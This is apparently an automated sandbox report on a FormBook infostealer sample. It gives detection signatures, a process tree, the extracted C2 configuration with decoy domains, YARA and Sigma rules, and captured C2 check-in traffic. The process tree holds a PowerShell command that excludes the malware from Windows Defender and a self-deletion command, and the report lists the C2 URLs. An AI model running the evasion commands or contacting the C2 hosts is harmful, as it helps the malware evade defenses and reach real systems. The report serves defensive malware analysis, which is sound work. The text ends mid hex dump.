Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report MAPO-PI.exe

Overview

General Information

Sample Name:MAPO-PI.exe
Analysis ID:510736
MD5:c619bbbe3c374c8fd3e9f2c26d087496
SHA1:a8f7e80f2c8e7687789f2267935610f81bc773d4
SHA256:260b61ddee5133e450110555cf0675ad6c015f51e6053c8fdc169db5e01bf993
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
.NET source code contains potential unpacker
Sigma detected: Powershell Defender Exclusion
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Adds a directory exclusion to Windows Defender
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • MAPO-PI.exe (PID: 3868 cmdline: 'C:\Users\user\Desktop\MAPO-PI.exe' MD5: C619BBBE3C374C8FD3E9F2C26D087496)
    • powershell.exe (PID: 2592 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • MAPO-PI.exe (PID: 5128 cmdline: C:\Users\user\Desktop\MAPO-PI.exe MD5: C619BBBE3C374C8FD3E9F2C26D087496)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmmon32.exe (PID: 6928 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)
          • cmd.exe (PID: 980 cmdline: /c del 'C:\Users\user\Desktop\MAPO-PI.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.diofis.com/rigx/"], "decoy": ["cisworkfromhome.com", "pizzanpickle.com", "southusen.com", "pinarekinci.com", "themilocat.com", "goio.digital", "smoothed-way.com", "lifeinformpodcast.com", "transforming-leadership.com", "winebreak.net", "diversityleadershipprogram.com", "orrisinvest.com", "mylearningplaylist.net", "chiromsrealestate.com", "todaychat.info", "solevux.com", "giacomodifino.com", "escortagents.com", "handstandsandhairties.com", "getsettn.com", "rocketsanitizerbox.com", "ryanmelissa.com", "loiriemagazine.com", "comparedietdrops.com", "email-m3comva.com", "lescopainsdumarche.net", "samhing-hk.com", "themomentummakers.com", "thmmet.com", "theluxgalveston.com", "makelifesimpleagain.com", "133holbertonstreet.com", "ingam.design", "svgrbyts.com", "reunalia.com", "zumish.com", "202scott.com", "onllinetestbot.com", "homeofficetipps.com", "jollyfriendsglobal.com", "gardenstatemasks.com", "parkinsonfound.com", "fitpowersport.com", "decentrall.com", "zodiacoflauderdale.com", "0afd.xyz", "klutinariverfishing.com", "wanderlustmeetsmotherhood.net", "t7890.com", "espressomaschinen.store", "templarsy.com", "parastrong.com", "nongbake.com", "abcjapanese.com", "adorti.com", "sweeplux.com", "ssmjoin.com", "polyassemble.com", "sellmyhihome.com", "pekalonganhost.com", "sautilidades.com", "customwoodcuttingboards.com", "mindyourownbizzness.com", "jiujitsuspa.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x183f9:$sqlite3step: 68 34 1C 7B E1
    • 0x1850c:$sqlite3step: 68 34 1C 7B E1
    • 0x18428:$sqlite3text: 68 38 2A 90 C5
    • 0x1854d:$sqlite3text: 68 38 2A 90 C5
    • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
    00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 30 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.0.MAPO-PI.exe.400000.8.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.0.MAPO-PI.exe.400000.8.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.0.MAPO-PI.exe.400000.8.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x175f9:$sqlite3step: 68 34 1C 7B E1
        • 0x1770c:$sqlite3step: 68 34 1C 7B E1
        • 0x17628:$sqlite3text: 68 38 2A 90 C5
        • 0x1774d:$sqlite3text: 68 38 2A 90 C5
        • 0x1763b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17763:$sqlite3blob: 68 53 D8 7F 8C
        3.0.MAPO-PI.exe.400000.6.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          3.0.MAPO-PI.exe.400000.6.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 23 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Powershell Defender ExclusionShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\MAPO-PI.exe' , ParentImage: C:\Users\user\Desktop\MAPO-PI.exe, ParentProcessId: 3868, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe', ProcessId: 2592
          Sigma detected: Non Interactive PowerShellShow sources
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\MAPO-PI.exe' , ParentImage: C:\Users\user\Desktop\MAPO-PI.exe, ParentProcessId: 3868, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe', ProcessId: 2592
          Sigma detected: T1086 PowerShell ExecutionShow sources
          Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132799056056937018.2592.DefaultAppDomain.powershell

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.diofis.com/rigx/"], "decoy": ["cisworkfromhome.com", "pizzanpickle.com", "southusen.com", "pinarekinci.com", "themilocat.com", "goio.digital", "smoothed-way.com", "lifeinformpodcast.com", "transforming-leadership.com", "winebreak.net", "diversityleadershipprogram.com", "orrisinvest.com", "mylearningplaylist.net", "chiromsrealestate.com", "todaychat.info", "solevux.com", "giacomodifino.com", "escortagents.com", "handstandsandhairties.com", "getsettn.com", "rocketsanitizerbox.com", "ryanmelissa.com", "loiriemagazine.com", "comparedietdrops.com", "email-m3comva.com", "lescopainsdumarche.net", "samhing-hk.com", "themomentummakers.com", "thmmet.com", "theluxgalveston.com", "makelifesimpleagain.com", "133holbertonstreet.com", "ingam.design", "svgrbyts.com", "reunalia.com", "zumish.com", "202scott.com", "onllinetestbot.com", "homeofficetipps.com", "jollyfriendsglobal.com", "gardenstatemasks.com", "parkinsonfound.com", "fitpowersport.com", "decentrall.com", "zodiacoflauderdale.com", "0afd.xyz", "klutinariverfishing.com", "wanderlustmeetsmotherhood.net", "t7890.com", "espressomaschinen.store", "templarsy.com", "parastrong.com", "nongbake.com", "abcjapanese.com", "adorti.com", "sweeplux.com", "ssmjoin.com", "polyassemble.com", "sellmyhihome.com", "pekalonganhost.com", "sautilidades.com", "customwoodcuttingboards.com", "mindyourownbizzness.com", "jiujitsuspa.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: MAPO-PI.exeVirustotal: Detection: 30%Perma Link
          Source: MAPO-PI.exeReversingLabs: Detection: 39%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.0.MAPO-PI.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.MAPO-PI.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.MAPO-PI.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.MAPO-PI.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.MAPO-PI.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.MAPO-PI.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.MAPO-PI.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.MAPO-PI.exe.3734c80.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.MAPO-PI.exe.36e6660.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.293340895.00000000017E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.238587135.00000000035B9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.494133182.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.275167353.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.264363163.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.495159274.0000000002D30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.236279072.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.235333342.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: 3.0.MAPO-PI.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.2.MAPO-PI.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.0.MAPO-PI.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.0.MAPO-PI.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: MAPO-PI.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: MAPO-PI.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cmmon32.pdb source: MAPO-PI.exe, 00000003.00000002.293436175.0000000001850000.00000040.00020000.sdmp
          Source: Binary string: cmmon32.pdbGCTL source: MAPO-PI.exe, 00000003.00000002.293436175.0000000001850000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: MAPO-PI.exe, 00000003.00000002.293616666.000000000198F000.00000040.00000001.sdmp, cmmon32.exe, 00000010.00000002.497241388.0000000004C40000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: MAPO-PI.exe, cmmon32.exe

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49795 -> 109.232.217.55:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49795 -> 109.232.217.55:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49795 -> 109.232.217.55:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 159.65.10.143 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.lifeinformpodcast.com
          Source: C:\Windows\explorer.exeDomain query: www.transforming-leadership.com
          Source: C:\Windows\explorer.exeDomain query: www.diofis.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 109.232.217.55 80Jump to behavior
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.diofis.com/rigx/
          Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
          Source: Joe Sandbox ViewASN Name: AEROTEK-ASTR AEROTEK-ASTR
          Source: global trafficHTTP traffic detected: GET /rigx/?8pr=9rQH8&1btd7D=sXodP5plw2zuBk5jc17bfKeMRD93SLnVb+AwVzSLCtQvXrT73UIO1hDRl0kooUZyQ/sm HTTP/1.1Host: www.lifeinformpodcast.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rigx/?1btd7D=9134s0FnLt/OWarUedgABr9C/c4q5kSlc0KYi18j8Gti+B07oVRLIxAr1gTintGupYIr&8pr=9rQH8 HTTP/1.1Host: www.transforming-leadership.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rigx/?8pr=9rQH8&1btd7D=x7Tu96cHMgTmU7mY47TISrjDcbGhV6G9B99bVm0ZcSL4vblov6CXxXD4o82KDOntdPMV HTTP/1.1Host: www.diofis.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 28 Oct 2021 05:41:15 GMTContent-Type: text/htmlContent-Length: 275ETag: "61797038-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 28 Oct 2021 05:41:35 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.transforming-leadership.com/wp-json/>; rel="https://api.w.org/"Referrer-Policy: no-referrer-when-downgradeConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 39 37 65 33 0d 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 41 55 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 74 72 61 6e 73 66 6f 72 6d 69 6e 67 2d 6c 65 61 64 65 72 73 68 69 70 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 31 37 2e 34 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 54 72 61 6e 73 66 6f 72 6d 69 6e 67 20 4c 65 61 64 65 72 73 68 69 70 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 54 72 61 6e 73 66 6f 72 6d 69 6e 67 20 4c 65 61 64 65 72 73 68 69 70 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 54 72 61 6e 73 66 6f 72 6d 69 6e 67 20 4c 65 61 64 65 72 73 68 69 70 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 72 61 6e 73 66 6f 72 6d 69 6e 67 2d 6c 65 61 64 65 72 73 68 69 70 2e 63 6f 6d 2f 23 77 65 62 73 69 74 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 72 61 6e 73 66 6f 72 6d 69 6e 67 2d
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.24content-type: text/html; charset=UTF-8expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <http://www.diofis.com/wp-json/>; rel="https://api.w.org/"x-litespeed-cache: misscontent-length: 33607date: Thu, 28 Oct 2021 05:41:56 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 72 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 31 35 2e 39 2e 32 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 53 61 79 66 61 20 62 75 6c 75 6e 61 6d 61 64 c4 b1 20 2d 20 64 69 6f 66 69 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 72 5f 54 52 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 53 61 79 66 61 20 62 75 6c 75 6e 61 6d 61 64 c4 b1 20 2d 20 64 69 6f 66 69 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 64 69 6f 66 69 73 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 